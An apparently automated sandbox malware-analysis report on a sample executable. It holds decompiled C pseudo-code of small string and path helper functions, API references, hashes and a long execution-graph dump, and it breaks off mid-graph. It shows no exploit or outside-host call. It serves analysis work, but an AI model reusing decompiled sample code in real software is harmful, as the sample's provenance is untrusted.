                                                        						_t3 = GlobalFree(_t6);
                                                        					} while (_t8 != 0);
                                                        				}
                                                        				 *0x429854 =  *0x429854 & 0x00000000;
                                                        				return _t3;
                                                        			}







                                                        0x00403876
                                                        0x0040387e
                                                        0x00403885
                                                        0x00403888
                                                        0x00403888
                                                        0x0040388a
                                                        0x0040388f
                                                        0x00403896
                                                        0x0040389c
                                                        0x004038a0
                                                        0x004038a1
                                                        0x004038a9

                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,747DFA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                        • GlobalFree.KERNEL32 ref: 00403896
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-3936084776
                                                        • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                        • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                        • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                        • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405AD6(char* _a4) {
                                                        				char* _t3;
                                                        				char* _t5;
                                                        
                                                        				_t5 = _a4;
                                                        				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                        				while( *_t3 != 0x5c) {
                                                        					_t3 = CharPrevA(_t5, _t3);
                                                        					if(_t3 > _t5) {
                                                        						continue;
                                                        					}
                                                        					break;
                                                        				}
                                                        				 *_t3 =  *_t3 & 0x00000000;
                                                        				return  &(_t3[1]);
                                                        			}





                                                        0x00405ad7
                                                        0x00405ae1
                                                        0x00405ae3
                                                        0x00405aea
                                                        0x00405af2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405af2
                                                        0x00405af4
                                                        0x00405af9

                                                        APIs
                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dY5HmgsBm6.exe,C:\Users\user\Desktop\dY5HmgsBm6.exe,80000000,00000003), ref: 00405ADC
                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dY5HmgsBm6.exe,C:\Users\user\Desktop\dY5HmgsBm6.exe,80000000,00000003), ref: 00405AEA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-3125694417
                                                        • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                        • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                        • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                        • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                        				int _v8;
                                                        				int _t12;
                                                        				int _t14;
                                                        				int _t15;
                                                        				CHAR* _t17;
                                                        				CHAR* _t27;
                                                        
                                                        				_t12 = lstrlenA(_a8);
                                                        				_t27 = _a4;
                                                        				_v8 = _t12;
                                                        				while(lstrlenA(_t27) >= _v8) {
                                                        					_t14 = _v8;
                                                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                        					_t15 = lstrcmpiA(_t27, _a8);
                                                        					_t27[_v8] =  *(_t14 + _t27);
                                                        					if(_t15 == 0) {
                                                        						_t17 = _t27;
                                                        					} else {
                                                        						_t27 = CharNextA(_t27);
                                                        						continue;
                                                        					}
                                                        					L5:
                                                        					return _t17;
                                                        				}
                                                        				_t17 = 0;
                                                        				goto L5;
                                                        			}









                                                        0x00405c05
                                                        0x00405c07
                                                        0x00405c0a
                                                        0x00405c36
                                                        0x00405c0f
                                                        0x00405c18
                                                        0x00405c1d
                                                        0x00405c28
                                                        0x00405c2b
                                                        0x00405c47
                                                        0x00405c2d
                                                        0x00405c34
                                                        0x00000000
                                                        0x00405c34
                                                        0x00405c40
                                                        0x00405c44
                                                        0x00405c44
                                                        0x00405c3e
                                                        0x00000000

                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                                                        • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                        • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                        • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                        • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:5.6%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:6%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:35

                                                        Graph

                                                        execution_graph 22951 417167 22952 417170 22951->22952 22961 4207c0 _vsnwprintf 22952->22961 22954 41721c 22963 4189b0 TlsGetValue 22954->22963 22956 41724e 22957 4171d8 22957->22954 22958 417208 22957->22958 22962 4189b0 TlsGetValue 22958->22962 22960 417215 22961->22957 22962->22960 22963->22956 15896 401000 memset GetModuleHandleW HeapCreate 16329 418520 HeapCreate TlsAlloc 15896->16329 15900 401053 16337 4176c0 HeapCreate 15900->16337 15902 401058 16338 416150 15902->16338 15906 401062 16344 412f2d LoadLibraryW 15906->16344 15908 40106c 16350 411d40 15908->16350 15912 40107b 16354 40cae0 15912->16354 15914 401085 16357 40aae7 15914->16357 15916 40108f 16362 40a9c2 InitializeCriticalSection 15916->16362 15918 401094 16363 4117ff 15918->16363 15922 4010b8 16371 418570 GetLastError TlsGetValue SetLastError 15922->16371 15924 4010c0 16372 4176e0 15924->16372 15928 4010d7 16382 418570 GetLastError TlsGetValue SetLastError 15928->16382 15930 4010dd 16383 418570 GetLastError TlsGetValue SetLastError 15930->16383 15932 4010e5 16384 418570 GetLastError TlsGetValue SetLastError 15932->16384 15934 4010f7 16385 418570 GetLastError TlsGetValue SetLastError 15934->16385 15936 4010ff 16386 417730 15936->16386 15938 401116 16396 40a212 TlsGetValue 15938->16396 15940 40111b 16397 416400 15940->16397 15943 4185b0 3 API calls 15944 40112d 15943->15944 16406 418570 GetLastError TlsGetValue SetLastError 15944->16406 15946 401133 16407 418570 GetLastError TlsGetValue SetLastError 15946->16407 15948 40113b 15949 417730 6 API calls 15948->15949 15950 401152 15949->15950 15951 4185b0 3 API calls 15950->15951 15952 40115c 15951->15952 16408 418570 GetLastError TlsGetValue SetLastError 15952->16408 15954 401162 16409 404acc 15954->16409 15957 4185b0 3 API calls 15958 40117f 15957->15958 16493 418570 GetLastError TlsGetValue SetLastError 15958->16493 15960 401185 16494 40548e 15960->16494 15963 4185b0 3 API calls 15964 4011a8 15963->15964 16542 418570 GetLastError TlsGetValue SetLastError 15964->16542 15966 4011ae 15967 40548e 45 API calls 15966->15967 15968 4011c7 15967->15968 15969 4185b0 3 API calls 15968->15969 15970 4011d1 15969->15970 16543 418570 GetLastError TlsGetValue SetLastError 15970->16543 15972 4011d7 15973 40548e 45 API calls 15972->15973 15974 4011f0 15973->15974 15975 4185b0 3 API calls 15974->15975 15976 4011fa 15975->15976 16544 418570 GetLastError TlsGetValue SetLastError 15976->16544 15978 401200 16545 418570 GetLastError TlsGetValue SetLastError 15978->16545 15980 401208 16546 40ab16 GetEnvironmentVariableW 15980->16546 15982 401215 16550 418640 15982->16550 15984 401220 15985 418640 4 API calls 15984->15985 15986 40122c 15985->15986 15987 4185b0 3 API calls 15986->15987 15988 401236 15987->15988 16555 418570 GetLastError TlsGetValue SetLastError 15988->16555 15990 40123c 16556 418570 GetLastError TlsGetValue SetLastError 15990->16556 15992 401244 15993 40548e 45 API calls 15992->15993 15994 40125d 15993->15994 16557 40a212 TlsGetValue 15994->16557 15996 401262 16558 40a230 15996->16558 16000 401280 16001 418640 4 API calls 16000->16001 16002 401288 16001->16002 16003 418640 4 API calls 16002->16003 16004 401293 16003->16004 16005 4185b0 3 API calls 16004->16005 16006 40129d 16005->16006 16007 4012dc 16006->16007 16010 4012bf 16006->16010 16562 418570 GetLastError TlsGetValue SetLastError 16007->16562 16009 4012e2 16563 408bb3 16009->16563 16010->16006 16010->16007 16014 40c4f3 2 API calls 16010->16014 16750 405a53 16010->16750 16014->16010 16016 4012f4 16594 418570 GetLastError TlsGetValue SetLastError 16016->16594 16018 401300 16019 418640 4 API calls 16018->16019 16020 401308 16019->16020 16021 418640 4 API calls 16020->16021 16022 401313 16021->16022 16595 40a240 16022->16595 16025 40a240 TlsGetValue 16026 40131f 16025->16026 16093 401387 16026->16093 16778 418570 GetLastError TlsGetValue SetLastError 16026->16778 16028 4013a1 16598 418570 GetLastError TlsGetValue SetLastError 16028->16598 16029 40192c 16996 418570 GetLastError TlsGetValue SetLastError 16029->16996 16030 40132e 16779 418570 GetLastError TlsGetValue SetLastError 16030->16779 16034 401932 16997 418570 GetLastError TlsGetValue SetLastError 16034->16997 16035 4013a7 16038 40548e 45 API calls 16035->16038 16036 401336 16780 418570 GetLastError TlsGetValue SetLastError 16036->16780 16041 4013c0 16038->16041 16040 40193a 16043 40548e 45 API calls 16040->16043 16044 4185b0 3 API calls 16041->16044 16042 40133e 16045 408bb3 40 API calls 16042->16045 16046 401953 16043->16046 16047 4013ca CreateMutexW 16044->16047 16048 40134a 16045->16048 16998 40a212 TlsGetValue 16046->16998 16050 4013f0 16047->16050 16051 4013e5 GetLastError 16047->16051 16781 40a212 TlsGetValue 16048->16781 16055 4013ff 16050->16055 16599 418570 GetLastError TlsGetValue SetLastError 16050->16599 16051->16050 16053 40134f 16782 40c723 16053->16782 16054 401958 16063 40a230 3 API calls 16054->16063 16057 401c1c ExitProcess 16055->16057 16749 418550 HeapDestroy TlsFree 16057->16749 16061 40140a 16600 418570 GetLastError TlsGetValue SetLastError 16061->16600 16067 401965 16063->16067 16064 401c2b HeapDestroy ExitProcess 16066 40135c 16786 418570 GetLastError TlsGetValue SetLastError 16066->16786 16999 418570 GetLastError TlsGetValue SetLastError 16067->16999 16068 401412 16070 40548e 45 API calls 16068->16070 16072 40142b 16070->16072 16071 401368 16073 418640 4 API calls 16071->16073 16601 40a212 TlsGetValue 16072->16601 16077 401370 16073->16077 16080 418640 4 API calls 16077->16080 16078 401991 16081 418640 4 API calls 16078->16081 16079 401430 16086 40a230 3 API calls 16079->16086 16082 40137b 16080->16082 16083 401999 16081->16083 16084 40a240 TlsGetValue 16082->16084 16085 418640 4 API calls 16083->16085 16087 401380 16084->16087 16088 4019a4 16085->16088 16089 40143d 16086->16089 16090 40a240 TlsGetValue 16087->16090 16091 418640 4 API calls 16088->16091 16092 401462 16089->16092 16787 418570 GetLastError TlsGetValue SetLastError 16089->16787 16090->16093 16095 4019b0 16091->16095 16602 405b17 16092->16602 16093->16028 16093->16029 16099 418640 4 API calls 16095->16099 16097 401451 16788 408240 16097->16788 16102 4019bb 16099->16102 16105 4185b0 3 API calls 16102->16105 16108 4019c5 16105->16108 16106 4185b0 3 API calls 16106->16092 17000 418570 GetLastError TlsGetValue SetLastError 16108->17000 16109 401488 16111 40548e 45 API calls 16109->16111 16114 4014a1 16111->16114 16112 4019cb 17001 418570 GetLastError TlsGetValue SetLastError 16112->17001 16116 4185b0 3 API calls 16114->16116 16115 4019d9 16117 418640 4 API calls 16115->16117 16280 4014ab 16116->16280 16118 4019e1 16117->16118 16119 418640 4 API calls 16118->16119 16120 4019ec 16119->16120 17002 40a212 TlsGetValue 16120->17002 16123 4016e8 16803 418570 GetLastError TlsGetValue SetLastError 16123->16803 16124 418570 GetLastError TlsGetValue SetLastError 16124->16280 16125 4019f1 17003 40c735 16125->17003 16128 4016f0 16130 40548e 45 API calls 16128->16130 16132 401709 16130->16132 16131 40a230 3 API calls 16133 4019fe 16131->16133 16804 40a212 TlsGetValue 16132->16804 16135 40c4f3 2 API calls 16133->16135 16137 401a08 16135->16137 16136 40170e 16139 40a230 3 API calls 16136->16139 17008 418570 GetLastError TlsGetValue SetLastError 16137->17008 16142 40171b 16139->16142 16140 401a0e 17009 418570 GetLastError TlsGetValue SetLastError 16140->17009 16144 401739 16142->16144 16145 401729 16142->16145 16143 401a21 16147 418640 4 API calls 16143->16147 16144->16055 16151 401750 16144->16151 16805 403e49 16145->16805 16146 4165d0 TlsGetValue RtlReAllocateHeap HeapReAlloc TlsGetValue 16146->16280 16149 401a29 16147->16149 16150 418640 4 API calls 16149->16150 16152 401a34 16150->16152 16851 418570 GetLastError TlsGetValue SetLastError 16151->16851 17010 40a212 TlsGetValue 16152->17010 16155 401756 16157 40548e 45 API calls 16155->16157 16156 401a39 16160 40a230 3 API calls 16156->16160 16158 40176f 16157->16158 16159 4185b0 3 API calls 16158->16159 16161 401779 16159->16161 16162 401a46 16160->16162 16852 418570 GetLastError TlsGetValue SetLastError 16161->16852 17011 418570 GetLastError TlsGetValue SetLastError 16162->17011 16164 40177f 16166 40548e 45 API calls 16164->16166 16169 401798 16166->16169 16168 401a4c 17012 418570 GetLastError TlsGetValue SetLastError 16168->17012 16171 4185b0 3 API calls 16169->16171 16174 4017a2 16171->16174 16172 401a54 17013 418570 GetLastError TlsGetValue SetLastError 16172->17013 16853 418570 GetLastError TlsGetValue SetLastError 16174->16853 16175 401a61 17014 418570 GetLastError TlsGetValue SetLastError 16175->17014 16178 4017a8 16854 418570 GetLastError TlsGetValue SetLastError 16178->16854 16179 401a69 17015 418570 GetLastError TlsGetValue SetLastError 16179->17015 16182 4017b0 16184 40548e 45 API calls 16182->16184 16183 401a71 17016 418570 GetLastError TlsGetValue SetLastError 16183->17016 16186 4017c9 16184->16186 16855 40a212 TlsGetValue 16186->16855 16187 401a79 17017 40ab53 16187->17017 16190 4017ce 16194 40a230 3 API calls 16190->16194 16193 401a85 16196 40c723 6 API calls 16193->16196 16195 4017db 16194->16195 16856 418570 GetLastError TlsGetValue SetLastError 16195->16856 16197 401a8d 16196->16197 17025 40a212 TlsGetValue 16197->17025 16200 401a92 17026 416760 16200->17026 16202 401808 16857 418570 GetLastError TlsGetValue SetLastError 16202->16857 16203 401a9a 17034 4186a0 TlsGetValue 16203->17034 16206 401810 16208 40548e 45 API calls 16206->16208 16207 401a9f 16210 40a240 TlsGetValue 16207->16210 16211 401829 16208->16211 16209 40548e 45 API calls 16209->16280 16214 401aa9 16210->16214 16858 40a212 TlsGetValue 16211->16858 16213 40182e 16217 40a230 3 API calls 16213->16217 16215 401b6e 16214->16215 17035 418570 GetLastError TlsGetValue SetLastError 16214->17035 17077 418570 GetLastError TlsGetValue SetLastError 16215->17077 16221 40183b 16217->16221 16219 401b74 17078 418570 GetLastError TlsGetValue SetLastError 16219->17078 16220 401abc 17036 418570 GetLastError TlsGetValue SetLastError 16220->17036 16859 418570 GetLastError TlsGetValue SetLastError 16221->16859 16223 418640 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 16223->16280 16225 401b82 17079 418570 GetLastError TlsGetValue SetLastError 16225->17079 16226 401ac4 17037 418570 GetLastError TlsGetValue SetLastError 16226->17037 16230 401868 16860 418570 GetLastError TlsGetValue SetLastError 16230->16860 16231 401b8a 16234 40ab53 7 API calls 16231->16234 16232 401ad6 17038 418570 GetLastError TlsGetValue SetLastError 16232->17038 16238 401b91 16234->16238 16236 401ade 17039 418570 GetLastError TlsGetValue SetLastError 16236->17039 16237 401870 16240 40548e 45 API calls 16237->16240 17080 40a212 TlsGetValue 16238->17080 16243 401889 16240->16243 16242 401af1 17040 418570 GetLastError TlsGetValue SetLastError 16242->17040 16861 40a212 TlsGetValue 16243->16861 16244 401b96 17081 40c7c6 16244->17081 16248 401af9 17041 418570 GetLastError TlsGetValue SetLastError 16248->17041 16249 40188e 16258 40a230 3 API calls 16249->16258 16251 4186a0 TlsGetValue 16251->16280 16253 40a230 3 API calls 16255 401ba3 16253->16255 16254 401b01 17042 418570 GetLastError TlsGetValue SetLastError 16254->17042 16259 40c4f3 2 API calls 16255->16259 16256 40a212 TlsGetValue 16256->16280 16261 40189b 16258->16261 16262 401bad 16259->16262 16260 401b09 16263 40ab53 7 API calls 16260->16263 16862 418570 GetLastError TlsGetValue SetLastError 16261->16862 17085 418570 GetLastError TlsGetValue SetLastError 16262->17085 16266 401b10 16263->16266 16265 401bb3 17086 418570 GetLastError TlsGetValue SetLastError 16265->17086 17043 40a212 TlsGetValue 16266->17043 16268 4185b0 TlsGetValue RtlAllocateHeap HeapReAlloc 16268->16280 16271 4018c8 16863 418570 GetLastError TlsGetValue SetLastError 16271->16863 16272 401bbb 16275 40548e 45 API calls 16272->16275 16273 401b15 16277 40c723 6 API calls 16273->16277 16279 401bd4 16275->16279 16281 401b1d 16277->16281 16278 4018d0 16282 40548e 45 API calls 16278->16282 17087 40a212 TlsGetValue 16279->17087 16280->16124 16280->16146 16280->16209 16280->16223 16280->16251 16280->16256 16280->16268 16284 401641 16280->16284 16328 40169b 16280->16328 16640 405303 16280->16640 16695 40705d 16280->16695 16746 40c4f3 16280->16746 17044 40a212 TlsGetValue 16281->17044 16287 4018e9 16282->16287 16799 418570 GetLastError TlsGetValue SetLastError 16284->16799 16286 401b22 17045 4167d0 16286->17045 16864 40a212 TlsGetValue 16287->16864 16291 40164d 16295 418640 4 API calls 16291->16295 16292 401b2a 17061 40a212 TlsGetValue 16292->17061 16293 4018ee 16305 40a230 3 API calls 16293->16305 16294 401bd9 16297 40a230 3 API calls 16294->16297 16298 401655 16295->16298 16302 401be6 16297->16302 16299 4185b0 3 API calls 16298->16299 16303 40165f 16299->16303 16301 401b2f 16304 416400 6 API calls 16301->16304 17088 40abf2 16302->17088 16800 418570 GetLastError TlsGetValue SetLastError 16303->16800 16308 401b37 16304->16308 16309 4018fb 16305->16309 16312 4185b0 3 API calls 16308->16312 16865 404ddb 16309->16865 16311 40166b 16314 418640 4 API calls 16311->16314 16315 401b41 PathFileExistsW 16312->16315 16313 401927 16313->16057 16317 401673 16314->16317 16318 401b50 16315->16318 16320 4185b0 3 API calls 16317->16320 16318->16215 17062 409185 16318->17062 16321 40167d 16320->16321 16801 418570 GetLastError TlsGetValue SetLastError 16321->16801 16324 401689 16325 418640 4 API calls 16324->16325 16326 401691 16325->16326 16327 4185b0 3 API calls 16326->16327 16327->16328 16802 418570 GetLastError TlsGetValue SetLastError 16328->16802 17137 419000 HeapAlloc HeapAlloc TlsSetValue 16329->17137 16331 40104e 16332 417b67 16331->16332 17138 417ea7 HeapAlloc HeapAlloc InitializeCriticalSection 16332->17138 16334 417b76 CreateDCW 16335 417b91 GetDeviceCaps DeleteDC 16334->16335 16336 417ba8 16334->16336 16335->15900 16336->15900 16337->15902 17139 417cce 16338->17139 16341 4140ac 16342 417cce 7 API calls 16341->16342 16343 4140bc 16342->16343 16343->15906 16345 412f5b GetVersionExW 16344->16345 16346 412f4a GetProcAddress 16344->16346 16348 412f80 16345->16348 16346->16345 16347 412f89 16347->15908 16348->16347 17150 412c47 LoadLibraryW 16348->17150 17160 417ea7 HeapAlloc HeapAlloc InitializeCriticalSection 16350->17160 16352 401076 16353 411b7f TlsAlloc 16352->16353 16353->15912 17161 417ea7 HeapAlloc HeapAlloc InitializeCriticalSection 16354->17161 16356 40caee 16356->15914 16358 417cce 7 API calls 16357->16358 16359 40aaf2 16358->16359 17162 417ea7 HeapAlloc HeapAlloc InitializeCriticalSection 16359->17162 16361 40ab05 InitializeCriticalSection 16361->15916 16362->15918 17163 411a76 16363->17163 16366 41181c HeapAlloc 16368 41183b memset 16366->16368 16369 41187f 16366->16369 16367 4010b2 16370 418570 GetLastError TlsGetValue SetLastError 16367->16370 16368->16369 16369->16367 16370->15922 16371->15924 16373 4176ed 16372->16373 17177 4188d0 TlsGetValue 16373->17177 16376 417711 memcpy 16377 4010cd 16376->16377 16378 4185b0 TlsGetValue 16377->16378 16379 4185f6 HeapReAlloc 16378->16379 16380 4185d9 RtlAllocateHeap 16378->16380 16381 418617 16379->16381 16380->16381 16381->15928 16382->15930 16383->15932 16384->15934 16385->15936 16387 417750 16386->16387 16388 4177a8 16386->16388 16389 4188d0 3 API calls 16387->16389 16390 417803 MultiByteToWideChar 16388->16390 16393 417779 16389->16393 16392 4188d0 3 API calls 16390->16392 16395 417820 MultiByteToWideChar 16392->16395 17183 4189b0 TlsGetValue 16393->17183 16394 41779d 16394->15938 16395->15938 16396->15940 17184 418a10 TlsGetValue 16397->17184 16400 4188d0 3 API calls 16401 416428 16400->16401 16404 416434 16401->16404 17187 418a60 TlsGetValue 16401->17187 17186 4189b0 TlsGetValue 16404->17186 16405 401123 16405->15943 16406->15946 16407->15948 16408->15954 16410 404ad1 16409->16410 16410->16410 17188 418710 16410->17188 16413 40a230 3 API calls 16414 404aec 16413->16414 17200 40a040 16414->17200 16417 40a040 2 API calls 16418 404b05 16417->16418 17203 418570 GetLastError TlsGetValue SetLastError 16418->17203 16420 404b0b 17204 418570 GetLastError TlsGetValue SetLastError 16420->17204 16422 404b13 17205 418570 GetLastError TlsGetValue SetLastError 16422->17205 16424 404b1b 17206 418570 GetLastError TlsGetValue SetLastError 16424->17206 16426 404b23 17207 418570 GetLastError TlsGetValue SetLastError 16426->17207 16428 404b2b 16429 416400 6 API calls 16428->16429 16430 404b40 16429->16430 17208 4186a0 TlsGetValue 16430->17208 16432 404b45 17209 418570 GetLastError TlsGetValue SetLastError 16432->17209 16434 404b4b 17210 408158 16434->17210 16438 404b5b 17228 40a212 TlsGetValue 16438->17228 16440 404b63 17229 40f360 16440->17229 16444 404b71 17236 40519b 16444->17236 16447 4185b0 3 API calls 16448 404b83 16447->16448 17253 418570 GetLastError TlsGetValue SetLastError 16448->17253 16450 404b89 16451 40519b 39 API calls 16450->16451 16452 404b94 16451->16452 16453 4185b0 3 API calls 16452->16453 16454 404b9e 16453->16454 17254 418570 GetLastError TlsGetValue SetLastError 16454->17254 16456 404ba4 17255 405040 16456->17255 16459 4185b0 3 API calls 16460 404bbd 16459->16460 17278 418570 GetLastError TlsGetValue SetLastError 16460->17278 16462 404bc3 16463 405040 58 API calls 16462->16463 16464 404bd2 16463->16464 16465 4185b0 3 API calls 16464->16465 16466 404bdc 16465->16466 17279 418570 GetLastError TlsGetValue SetLastError 16466->17279 16468 404be2 16469 405040 58 API calls 16468->16469 16470 404bf1 16469->16470 16471 4185b0 3 API calls 16470->16471 16472 404bfb 16471->16472 17280 418570 GetLastError TlsGetValue SetLastError 16472->17280 16474 404c05 16475 418640 4 API calls 16474->16475 16476 404c0d 16475->16476 17281 40a200 TlsGetValue 16476->17281 16478 404c14 16479 4187a0 HeapFree 16478->16479 16480 404c2c 16479->16480 16481 4187a0 HeapFree 16480->16481 16482 404c34 16481->16482 16483 4187a0 HeapFree 16482->16483 16484 404c3d 16483->16484 16485 4187a0 HeapFree 16484->16485 16486 404c46 16485->16486 16487 4187a0 HeapFree 16486->16487 16488 404c4f 16487->16488 16489 4187a0 HeapFree 16488->16489 16490 404c58 16489->16490 16491 4187a0 HeapFree 16490->16491 16492 401175 16491->16492 16492->15957 16493->15960 16495 405493 16494->16495 16495->16495 16496 418710 21 API calls 16495->16496 16497 4054a5 16496->16497 16498 40a230 3 API calls 16497->16498 16499 4054ae 16498->16499 16500 40a040 2 API calls 16499->16500 16501 4054ba 16500->16501 16502 40a040 2 API calls 16501->16502 16503 4054c7 16502->16503 16504 40a040 2 API calls 16503->16504 16505 4054d4 16504->16505 17473 418570 GetLastError TlsGetValue SetLastError 16505->17473 16507 4054ed 16508 418640 4 API calls 16507->16508 16509 4054fa 16508->16509 16510 418640 4 API calls 16509->16510 16511 405504 16510->16511 16512 418640 4 API calls 16511->16512 16513 40550f 16512->16513 16514 4185b0 3 API calls 16513->16514 16533 405519 16514->16533 16515 40563c 17477 418770 TlsGetValue 16515->17477 16517 405621 16518 4187a0 HeapFree 16517->16518 16519 40564e 16518->16519 16520 4187a0 HeapFree 16519->16520 16521 405657 16520->16521 16522 4187a0 HeapFree 16521->16522 16523 405660 16522->16523 16524 4187a0 HeapFree 16523->16524 16525 405669 16524->16525 16526 4187a0 HeapFree 16525->16526 16527 405672 16526->16527 16528 4187a0 HeapFree 16527->16528 16529 40119e 16528->16529 16529->15963 16530 418570 GetLastError TlsGetValue SetLastError 16530->16533 16531 4167d0 9 API calls 16531->16533 16532 4185b0 TlsGetValue RtlAllocateHeap HeapReAlloc 16532->16533 16533->16515 16533->16530 16533->16531 16533->16532 16534 4055f6 16533->16534 17474 418570 GetLastError TlsGetValue SetLastError 16534->17474 16536 4055fc 17475 418570 GetLastError TlsGetValue SetLastError 16536->17475 16538 405604 16539 4167d0 9 API calls 16538->16539 16540 40561a 16539->16540 17476 40a200 TlsGetValue 16540->17476 16542->15966 16543->15972 16544->15978 16545->15980 16547 40ab2c 16546->16547 16548 4188d0 3 API calls 16547->16548 16549 40ab37 GetEnvironmentVariableW 16548->16549 16549->15982 16551 418653 wcslen 16550->16551 16552 418662 16550->16552 16551->16552 16553 4188d0 3 API calls 16552->16553 16554 41866d 16553->16554 16554->15984 16555->15990 16556->15992 16557->15996 17478 4190a0 GetLastError TlsGetValue SetLastError 16558->17478 16560 40126f 16561 418570 GetLastError TlsGetValue SetLastError 16560->16561 16561->16000 16562->16009 16564 418710 21 API calls 16563->16564 16565 408bbb 16564->16565 16566 40a230 3 API calls 16565->16566 16567 408bc4 16566->16567 17479 418570 GetLastError TlsGetValue SetLastError 16567->17479 16569 408bca 17480 418570 GetLastError TlsGetValue SetLastError 16569->17480 16571 408bd2 17481 416980 16571->17481 16574 4185b0 3 API calls 16575 408be8 GetModuleFileNameW 16574->16575 16576 408c02 16575->16576 16577 408c29 16575->16577 17484 418570 GetLastError TlsGetValue SetLastError 16576->17484 17496 418570 GetLastError TlsGetValue SetLastError 16577->17496 16580 408c08 17485 418570 GetLastError TlsGetValue SetLastError 16580->17485 16581 